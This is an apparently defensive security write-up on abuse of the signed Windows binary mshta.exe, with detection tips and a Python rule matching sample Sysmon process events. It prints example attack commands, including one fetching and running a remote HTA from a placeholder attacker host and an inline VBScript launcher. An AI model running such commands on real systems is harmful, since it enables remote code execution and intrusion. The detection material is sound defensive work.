Mshta HTA Execution

Attackers abuse the signed mshta.exe to run HTML Applications and inline VBScript/JScript, proxying code execution under a trusted Windows binary.

mshta.exe (Microsoft HTML Application host) is a signed Windows binary that executes .hta files — HTML pages with embedded VBScript or JScript that run with full local trust, outside the browser's security sandbox. Its legitimate use is rare in modern environments, which makes any execution worth a second look.

Attackers abuse mshta.exe because it is Microsoft-signed, often allow-listed, and can execute script either from a local .hta file, from a remote URL, or inline directly on the command line. It is a staple of phishing chains: an email attachment or a macro launches mshta against an attacker-hosted page that bootstraps the next stage.

How it works

mshta can be pointed straight at a remote HTA, which it downloads and runs:

```text
mshta.exe http://attacker.example/a.hta
```

It can also execute script inline using the vbscript:/javascript: moniker, with no file on disk:

```text
mshta.exe vbscript:Close(Execute("...downstream launcher..."))
```

In both cases mshta parses the HTML/script and runs the embedded code with the privileges of the calling user. A typical HTA bootstraps a heavier payload — frequently by spawning powershell.exe with an encoded command. The recognisable indicators for an analyst are an http/https URL passed to mshta, the vbscript:/javascript: prefix, and the Execute(/Eval(/CreateObject( patterns inside the script body.

Detection & analysis

Static analysis:

  • An .hta file is just HTML — open it in a text editor. Look for <script> blocks, CreateObject("WScript.Shell"), Run/Exec, eval/Execute, base64 strings, and downstream powershell/cmd references. Deobfuscate inline string concatenation and Chr()-built strings.
  • Triage the command line with regex/YARA: mshta followed by http/https, vbscript:, javascript:, or a path in a user-writable directory (%TEMP%, %APPDATA%) flags likely abuse.

Dynamic analysis:

  • In a sandbox, observe whether mshta.exe makes outbound network connections (to fetch the remote HTA or beacon) — a strong signal, since legitimate local HTAs do not.
  • Examine the process tree. mshta.exe spawned by winword.exe, excel.exe, outlook.exe, wscript.exe, or cmd.exe, and/or spawning powershell.exe/cmd.exe, is a high-confidence chain indicator.

Detection rule hint:

Alert on Sysmon Event ID 1 where Image ends with \mshta.exe AND (the command line contains http/https/vbscript:/javascript: OR the parent is an Office or mail application). Because legitimate mshta use is uncommon, treating any execution as low-noise hunting telemetry — then correlating with Event ID 3 (network) and child powershell/cmd — is highly effective.
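The rule above written out as Python and run over constructed Sysmon Event ID 1 records, as an added example that is not part of the original page. Field names follow Sysmon's Image/CommandLine/ParentImage; the sample paths, URLs and the Office/shell name sets are assumptions, and the user-writable-path and mshta-child checks from the analysis section are folded in alongside the command-line and parent tests.

```python
import re

# Constructed sample Sysmon Event ID 1 records (not real telemetry); only the
# fields the rule reads are modelled. Paths and URLs are placeholders.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" http://attacker.example/a.hta',
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe vbscript:Close(Execute("..."))',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Users\alice\AppData\Roaming\update.hta",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -EncodedCommand <placeholder>",
     "ParentImage": r"C:\Windows\System32\mshta.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Program Files\Vendor\admin-console.hta",
     "ParentImage": r"C:\Windows\explorer.exe"},
]
# Remote URL, inline script moniker, or an HTA in a user-writable directory.
SUSPICIOUS_CMDLINE = re.compile(
    r"https?://|\bvbscript:|\bjavascript:|\\AppData\\|\\Temp\\|%APPDATA%|%TEMP%",
    re.IGNORECASE)
OFFICE_OR_MAIL_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
CHILD_SHELLS = {"powershell.exe", "cmd.exe"}

def basename(path):
    # Lower-cased file name of a Windows image path.
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def evaluate(event):
    """Return the reasons a Sysmon Event ID 1 record matches; empty list = no match."""
    if event.get("EventID") != 1:
        return []
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    reasons = []
    if image == "mshta.exe":
        hit = SUSPICIOUS_CMDLINE.search(event.get("CommandLine", ""))
        if hit:
            reasons.append(f"mshta command line contains {hit.group(0)!r}")
        if parent in OFFICE_OR_MAIL_PARENTS:
            reasons.append(f"mshta launched by Office/mail application {parent}")
    elif image in CHILD_SHELLS and parent == "mshta.exe":
        reasons.append(f"mshta spawned {image}")
    return reasons

def hunt(events):
    # (index, reasons) for every matching record, in input order.
    return [(i, evaluate(e)) for i, e in enumerate(events) if evaluate(e)]
```

The plain local HTA launched from explorer.exe (last sample) does not fire, which is the trade-off the hint makes: it is still worth keeping in low-noise hunting telemetry, but the alert itself stays on the URL, moniker, parent and child signals.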
